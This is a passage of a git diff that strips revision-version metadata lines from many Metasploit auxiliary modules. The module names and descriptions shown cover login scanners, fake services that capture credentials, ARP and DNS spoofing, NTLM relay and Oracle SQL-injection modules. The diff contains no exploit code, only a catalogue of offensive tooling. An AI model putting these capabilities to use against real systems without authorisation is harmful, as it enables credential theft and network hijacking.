a/modules/auxiliary/scanner/telnet/telnet_login.rb +++ b/modules/auxiliary/scanner/telnet/telnet_login.rb @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Telnet Login Check Scanner', - #'Version' => '$Revision$', + # 'Description' => %q{ This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin diff --git a/modules/auxiliary/scanner/telnet/telnet_version.rb b/modules/auxiliary/scanner/telnet/telnet_version.rb index 0225347fb5..b24fdb8e4e 100644 --- a/modules/auxiliary/scanner/telnet/telnet_version.rb +++ b/modules/auxiliary/scanner/telnet/telnet_version.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Telnet Service Banner Detection', - 'Version' => '$Revision$', 'Description' => 'Detect telnet services', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/tftp/tftpbrute.rb b/modules/auxiliary/scanner/tftp/tftpbrute.rb index b05f2d4bfc..489859d8f6 100644 --- a/modules/auxiliary/scanner/tftp/tftpbrute.rb +++ b/modules/auxiliary/scanner/tftp/tftpbrute.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'TFTP Brute Forcer', 'Description' => 'This module uses a dictionary to brute force valid TFTP image names from a TFTP server.', 'Author' => 'antoine', - 'Version' => '$Revision$', 'License' => BSD_LICENSE ) diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index 7540853f3f..4f182bf6b3 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'UPnP SSDP M-SEARCH Information Discovery', - 'Version' => '$Revision$', 'Description' => 'Discover information from UPnP-enabled systems', 'Author' => 'todb', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb index 06b3e20695..2d7c8c8d67 100644 --- a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb +++ b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VMWare ESX/ESXi Fingerprint Scanner', - 'Version' => '$Revision$', 'Description' => %Q{ This module accesses the web API interfaces for VMware ESX/ESXi servers and attempts to identify version information for that server. diff --git a/modules/auxiliary/scanner/vmware/vmauthd_login.rb b/modules/auxiliary/scanner/vmware/vmauthd_login.rb index f5137b903d..9a262b9478 100644 --- a/modules/auxiliary/scanner/vmware/vmauthd_login.rb +++ b/modules/auxiliary/scanner/vmware/vmauthd_login.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VMWare Authentication Daemon Login Scanner', - 'Version' => '$Revision$', 'Description' => %q{This module will test vmauthd logins on a range of machines and report successful logins. }, diff --git a/modules/auxiliary/scanner/vmware/vmauthd_version.rb b/modules/auxiliary/scanner/vmware/vmauthd_version.rb index f86b583c19..0c842b578f 100644 --- a/modules/auxiliary/scanner/vmware/vmauthd_version.rb +++ b/modules/auxiliary/scanner/vmware/vmauthd_version.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VMWare Authentication Daemon Version Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module will identify information about a host through the vmauthd service. diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb b/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb index 00e9759721..8815bce4c4 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VMWare Enumerate Permissions', - 'Version' => '$Revision$', 'Description' => %Q{ This module will log into the Web API of VMWare and try to enumerate all the user/group permissions. Unlike enum suers this is only diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb b/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb index 9039f597aa..8e1021578d 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VMWare Enumerate Active Sessions', - 'Version' => '$Revision$', 'Description' => %Q{ This module will log into the Web API of VMWare and try to enumerate all the login sessions. diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_users.rb b/modules/auxiliary/scanner/vmware/vmware_enum_users.rb index d09dc7e3a8..700fb3f96a 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_users.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_users.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VMWare Enumerate User Accounts', - 'Version' => '$Revision$', 'Description' => %Q{ This module will log into the Web API of VMWare and try to enumerate all the user accounts. If the VMware instance is connected to one or diff --git a/modules/auxiliary/scanner/vmware/vmware_host_details.rb b/modules/auxiliary/scanner/vmware/vmware_host_details.rb index fe9841ce7d..5bf6a1fbcc 100644 --- a/modules/auxiliary/scanner/vmware/vmware_host_details.rb +++ b/modules/auxiliary/scanner/vmware/vmware_host_details.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VMWare Enumerate Host Details', - 'Version' => '$Revision$', 'Description' => %Q{ This module attempts to enumerate information about the host systems through the VMWare web API. This can include information about the hardware installed on the host machine. diff --git a/modules/auxiliary/scanner/vmware/vmware_http_login.rb b/modules/auxiliary/scanner/vmware/vmware_http_login.rb index 9cbd153e75..ab2bbe2892 100644 --- a/modules/auxiliary/scanner/vmware/vmware_http_login.rb +++ b/modules/auxiliary/scanner/vmware/vmware_http_login.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VMWare Web Login Scanner', - 'Version' => '$Revision$', 'Description' => 'This module attempts to authenticate to the VMWare HTTP service for VmWare Server, ESX, and ESXI', 'Author' => ['theLightCosine'], diff --git a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb index d653e3d2dc..face2be067 100644 --- a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb +++ b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VMWare Screenshot Stealer', - 'Version' => '$Revision$', 'Description' => %Q{ This module uses supplied login credentials to connect to VMWare via the web interface. It then searches through the datastores looking for screenshots. diff --git a/modules/auxiliary/scanner/vnc/vnc_login.rb b/modules/auxiliary/scanner/vnc/vnc_login.rb index 39a0933af3..3a710d2e90 100644 --- a/modules/auxiliary/scanner/vnc/vnc_login.rb +++ b/modules/auxiliary/scanner/vnc/vnc_login.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VNC Authentication Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol diff --git a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb index 8de1d29e61..acbc46b9d2 100644 --- a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb +++ b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VNC Authentication None Detection', - 'Version' => '$Revision$', 'Description' => 'Detect VNC servers that support the "None" authentication method.', 'References' => [ diff --git a/modules/auxiliary/scanner/voice/recorder.rb b/modules/auxiliary/scanner/voice/recorder.rb index f6ad93fdc9..c3472d1640 100644 --- a/modules/auxiliary/scanner/voice/recorder.rb +++ b/modules/auxiliary/scanner/voice/recorder.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Telephone Line Voice Scanner', - 'Version' => '$Revision$', 'Description' => 'This module dials a range of phone numbers and records audio from each answered call', 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb b/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb index 71f16a6870..c9b67caf0d 100644 --- a/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb +++ b/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VxWorks WDB Agent Boot Parameter Scanner', - 'Version' => '$Revision$', 'Description' => 'Scan for exposed VxWorks wdbrpc daemons and dump the boot parameters from memory', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb b/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb index e5c3947332..7427a46f28 100644 --- a/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb +++ b/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VxWorks WDB Agent Version Scanner', - 'Version' => '$Revision$', 'Description' => 'Scan for exposed VxWorks wdbrpc daemons', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb b/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb index 3e91a5e365..7075db1147 100644 --- a/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb +++ b/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'WinRM Authentication Method Detection', - 'Version' => '$Revision$', 'Description' => %q{ This module sends a request to an HTTP/HTTPS service to see if it is a WinRM service. If it is a WinRM service, it also gathers the Authentication Methods supported. diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index deaaa15ddc..d8012fb723 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'WinRM Login Utility', - 'Version' => '$Revision$', 'Description' => %q{ This module attempts to authenticate to a WinRM service. It currently works only if the remote end allows Negotiate(NTLM) authentication. diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index 5ffd8f7914..ed09cfd583 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'WinRM WQL Query Runner', - 'Version' => '$Revision$', 'Description' => %q{ This module runs WQL queries against remote WinRM Services. Authentication is required. Currently only works with NTLM auth. diff --git a/modules/auxiliary/scanner/x11/open_x11.rb b/modules/auxiliary/scanner/x11/open_x11.rb index a30f5951a0..0de53e014a 100644 --- a/modules/auxiliary/scanner/x11/open_x11.rb +++ b/modules/auxiliary/scanner/x11/open_x11.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'X11 No-Auth Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module scans for X11 servers that allow anyone to connect without authentication. diff --git a/modules/auxiliary/server/browser_autopwn.rb b/modules/auxiliary/server/browser_autopwn.rb index dba6669df5..cd8e1a0274 100644 --- a/modules/auxiliary/server/browser_autopwn.rb +++ b/modules/auxiliary/server/browser_autopwn.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'HTTP Client Automatic Exploiter', - 'Version' => '$Revision$', 'Description' => %q{ This module has three actions. The first (and the default) is 'WebServer' which uses a combination of client-side and diff --git a/modules/auxiliary/server/capture/drda.rb b/modules/auxiliary/server/capture/drda.rb index b71f9f1ce8..2072b8545b 100644 --- a/modules/auxiliary/server/capture/drda.rb +++ b/modules/auxiliary/server/capture/drda.rb @@ -38,7 +38,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: DRDA (DB2, Informix, Derby)', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a fake DRDA (DB2, Informix, Derby) server that is designed to capture authentication credentials. diff --git a/modules/auxiliary/server/capture/ftp.rb b/modules/auxiliary/server/capture/ftp.rb index 2952aa8903..e0fcce9aed 100644 --- a/modules/auxiliary/server/capture/ftp.rb +++ b/modules/auxiliary/server/capture/ftp.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: FTP', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a fake FTP service that is designed to capture authentication credentials. diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb index 86b5f23284..90c48a9c56 100644 --- a/modules/auxiliary/server/capture/http.rb +++ b/modules/auxiliary/server/capture/http.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: HTTP', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a fake HTTP service that is designed to capture authentication credentials. diff --git a/modules/auxiliary/server/capture/http_ntlm.rb b/modules/auxiliary/server/capture/http_ntlm.rb index 8a0e4013b6..0cf8e81bed 100644 --- a/modules/auxiliary/server/capture/http_ntlm.rb +++ b/modules/auxiliary/server/capture/http_ntlm.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'HTTP Client MS Credential Catcher', - 'Version' => '$Revision$', 'Description' => %q{ This module attempts to quietly catch NTLM/LM Challenge hashes. }, @@ -31,7 +30,6 @@ class Metasploit3 < Msf::Auxiliary [ 'Ryan Linn ', ], - 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'Actions' => [ diff --git a/modules/auxiliary/server/capture/imap.rb b/modules/auxiliary/server/capture/imap.rb index 764bdfe52c..8b0df65051 100644 --- a/modules/auxiliary/server/capture/imap.rb +++ b/modules/auxiliary/server/capture/imap.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: IMAP', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a fake IMAP service that is designed to capture authentication credentials. diff --git a/modules/auxiliary/server/capture/mysql.rb b/modules/auxiliary/server/capture/mysql.rb index dba3449c76..83a21919ff 100644 --- a/modules/auxiliary/server/capture/mysql.rb +++ b/modules/auxiliary/server/capture/mysql.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: MySQL', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a fake MySQL service that is designed to capture authentication credentials. It captures challenge and diff --git a/modules/auxiliary/server/capture/pop3.rb b/modules/auxiliary/server/capture/pop3.rb index 888768c917..a967fe082d 100644 --- a/modules/auxiliary/server/capture/pop3.rb +++ b/modules/auxiliary/server/capture/pop3.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: POP3', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a fake POP3 service that is designed to capture authentication credentials. diff --git a/modules/auxiliary/server/capture/printjob_capture.rb b/modules/auxiliary/server/capture/printjob_capture.rb index eb64780bfa..198b38de7e 100644 --- a/modules/auxiliary/server/capture/printjob_capture.rb +++ b/modules/auxiliary/server/capture/printjob_capture.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Printjob Capture Service', - 'Version' => '$Revision$', 'Description' => %q{ This module is designed to listen for PJL or PostScript print jobs. Once a print job is detected it is saved to loot. The diff --git a/modules/auxiliary/server/capture/sip.rb b/modules/auxiliary/server/capture/sip.rb index 105671aef7..4ca4a8f310 100644 --- a/modules/auxiliary/server/capture/sip.rb +++ b/modules/auxiliary/server/capture/sip.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: SIP', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a fake SIP service that is designed to capture authentication credentials. It captures challenge and diff --git a/modules/auxiliary/server/capture/smb.rb b/modules/auxiliary/server/capture/smb.rb index af593b2078..24f67d9121 100644 --- a/modules/auxiliary/server/capture/smb.rb +++ b/modules/auxiliary/server/capture/smb.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: SMB', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client diff --git a/modules/auxiliary/server/capture/smtp.rb b/modules/auxiliary/server/capture/smtp.rb index 8b6cd7d103..500feec68b 100644 --- a/modules/auxiliary/server/capture/smtp.rb +++ b/modules/auxiliary/server/capture/smtp.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: SMTP', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a fake SMTP service that is designed to capture authentication credentials. diff --git a/modules/auxiliary/server/capture/telnet.rb b/modules/auxiliary/server/capture/telnet.rb index 9eaaf114f0..317feea516 100644 --- a/modules/auxiliary/server/capture/telnet.rb +++ b/modules/auxiliary/server/capture/telnet.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Authentication Capture: Telnet', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a fake Telnet service that is designed to capture authentication credentials. DONTs diff --git a/modules/auxiliary/server/dhcp.rb b/modules/auxiliary/server/dhcp.rb index 7f112a5c60..b08a04aacf 100644 --- a/modules/auxiliary/server/dhcp.rb +++ b/modules/auxiliary/server/dhcp.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'DHCP Server', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a DHCP service }, diff --git a/modules/auxiliary/server/dns/spoofhelper.rb b/modules/auxiliary/server/dns/spoofhelper.rb index e8cb80d419..cf5275988a 100644 --- a/modules/auxiliary/server/dns/spoofhelper.rb +++ b/modules/auxiliary/server/dns/spoofhelper.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'DNS Spoofing Helper Service', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a DNS service that returns TXT records indicating information about the querying service. diff --git a/modules/auxiliary/server/fakedns.rb b/modules/auxiliary/server/fakedns.rb index 425fd4fffc..60bd62c9e8 100644 --- a/modules/auxiliary/server/fakedns.rb +++ b/modules/auxiliary/server/fakedns.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Fake DNS Service', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a DNS service that redirects all queries to a particular address. diff --git a/modules/auxiliary/server/ftp.rb b/modules/auxiliary/server/ftp.rb index 1e2a1c47e3..31ae8e3dfc 100644 --- a/modules/auxiliary/server/ftp.rb +++ b/modules/auxiliary/server/ftp.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'FTP File Server', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a FTP service }, diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index 2edb6392ec..97e530ecf4 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'HTTP Client MS Credential Relayer', - 'Version' => '$Revision$', 'Description' => %q{ This module relays negotiated NTLM Credentials from an HTTP server to multiple protocols. Currently, this module supports relaying to SMB and HTTP. diff --git a/modules/auxiliary/server/pxexploit.rb b/modules/auxiliary/server/pxexploit.rb index 2738ec87e3..ca46df566c 100644 --- a/modules/auxiliary/server/pxexploit.rb +++ b/modules/auxiliary/server/pxexploit.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'PXE Boot Exploit Server', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that diff --git a/modules/auxiliary/server/socks4a.rb b/modules/auxiliary/server/socks4a.rb index fc3cef45f2..92d4b9b6b1 100644 --- a/modules/auxiliary/server/socks4a.rb +++ b/modules/auxiliary/server/socks4a.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Socks4a Proxy Server', - 'Version' => '$Revision$', 'Description' => 'This module provides a socks4a proxy server that uses the builtin Metasploit routing to relay connections.', 'Author' => 'sf', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/server/socks_unc.rb b/modules/auxiliary/server/socks_unc.rb index c232a18e61..12369ba295 100644 --- a/modules/auxiliary/server/socks_unc.rb +++ b/modules/auxiliary/server/socks_unc.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SOCKS Proxy UNC Path Redirection', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a Socks proxy service that redirects all HTTP requests to a web page that diff --git a/modules/auxiliary/server/tftp.rb b/modules/auxiliary/server/tftp.rb index bcd3a60d56..c9b5f6724c 100644 --- a/modules/auxiliary/server/tftp.rb +++ b/modules/auxiliary/server/tftp.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'TFTP File Server', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a TFTP service }, diff --git a/modules/auxiliary/server/webkit_xslt_dropper.rb b/modules/auxiliary/server/webkit_xslt_dropper.rb index cd70e067f8..6d7bc9c2b5 100644 --- a/modules/auxiliary/server/webkit_xslt_dropper.rb +++ b/modules/auxiliary/server/webkit_xslt_dropper.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary C:\Program Files\ }, 'Author' => [ 'Nicolas Gregoire' ], - 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'Actions' => [ diff --git a/modules/auxiliary/sniffer/psnuffle.rb b/modules/auxiliary/sniffer/psnuffle.rb index 8274192725..d8127e28f4 100644 --- a/modules/auxiliary/sniffer/psnuffle.rb +++ b/modules/auxiliary/sniffer/psnuffle.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'pSnuffle Packet Sniffer', - 'Version' => '$Revision$', 'Description' => 'This module sniffs passwords like dsniff did in the past', 'Author' => 'Max Moser ', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/spoof/arp/arp_poisoning.rb b/modules/auxiliary/spoof/arp/arp_poisoning.rb index 9e31a616bf..0cf36ddff6 100644 --- a/modules/auxiliary/spoof/arp/arp_poisoning.rb +++ b/modules/auxiliary/spoof/arp/arp_poisoning.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'ARP Spoof', - 'Version' => '$Revision$', 'Description' => %q{ Spoof ARP replies and poison remote ARP caches to conduct IP address spoofing or a denial of service. }, diff --git a/modules/auxiliary/spoof/cisco/dtp.rb b/modules/auxiliary/spoof/cisco/dtp.rb index 7fe4033eb6..99f9f5f8cc 100644 --- a/modules/auxiliary/spoof/cisco/dtp.rb +++ b/modules/auxiliary/spoof/cisco/dtp.rb @@ -14,7 +14,6 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super( 'Name' => 'Forge Cisco DTP Packets', - 'Version' => '$Revision$', 'Description' => %q{ This module forges DTP packets to initialize a trunk port. }, diff --git a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb index 0a25854f58..2e7c20ba66 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb @@ -34,7 +34,6 @@ class Metasploit3 < Msf::Auxiliary 'Cedric Blancher ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1447' ], diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb index 063eaf68b4..b646e33607 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'I)ruid', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1447' ], diff --git a/modules/auxiliary/spoof/dns/compare_results.rb b/modules/auxiliary/spoof/dns/compare_results.rb index 897eb0c293..c297dbd5b5 100644 --- a/modules/auxiliary/spoof/dns/compare_results.rb +++ b/modules/auxiliary/spoof/dns/compare_results.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ], diff --git a/modules/auxiliary/spoof/nbns/nbns_response.rb b/modules/auxiliary/spoof/nbns/nbns_response.rb index 3417e20bb1..9767bc4807 100644 --- a/modules/auxiliary/spoof/nbns/nbns_response.rb +++ b/modules/auxiliary/spoof/nbns/nbns_response.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Tim Medin ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html' ] diff --git a/modules/auxiliary/spoof/replay/pcap_replay.rb b/modules/auxiliary/spoof/replay/pcap_replay.rb index 6a62b8bff6..f34b2d5ba4 100644 --- a/modules/auxiliary/spoof/replay/pcap_replay.rb +++ b/modules/auxiliary/spoof/replay/pcap_replay.rb @@ -14,7 +14,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Pcap Replay Utility', - 'Version' => '$Revision$', 'Description' => %q{ Replay a pcap capture file }, diff --git a/modules/auxiliary/spoof/wifi/airpwn.rb b/modules/auxiliary/spoof/wifi/airpwn.rb index a61291eb3b..b16474fcb9 100644 --- a/modules/auxiliary/spoof/wifi/airpwn.rb +++ b/modules/auxiliary/spoof/wifi/airpwn.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Airpwn TCP Hijack', - 'Version' => '$Revision$', 'Description' => %q{ TCP streams are 'protected' only in so much as the sequence number is not guessable. diff --git a/modules/auxiliary/spoof/wifi/dnspwn.rb b/modules/auxiliary/spoof/wifi/dnspwn.rb index 8c91fc4df2..61a68e5b5e 100644 --- a/modules/auxiliary/spoof/wifi/dnspwn.rb +++ b/modules/auxiliary/spoof/wifi/dnspwn.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'DNSpwn DNS Hijack', - 'Version' => '$Revision$', 'Description' => %q{ Race DNS responses and replace DNS queries }, diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb index e2e0f79ca2..f6421601d3 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3996' ], diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb index 49d656f22c..5156e9099d 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3995' ], diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb index 99e9098329..189e4de457 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0870' ], diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb index 118ef12511..597cf9eb19 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-2415' ], diff --git 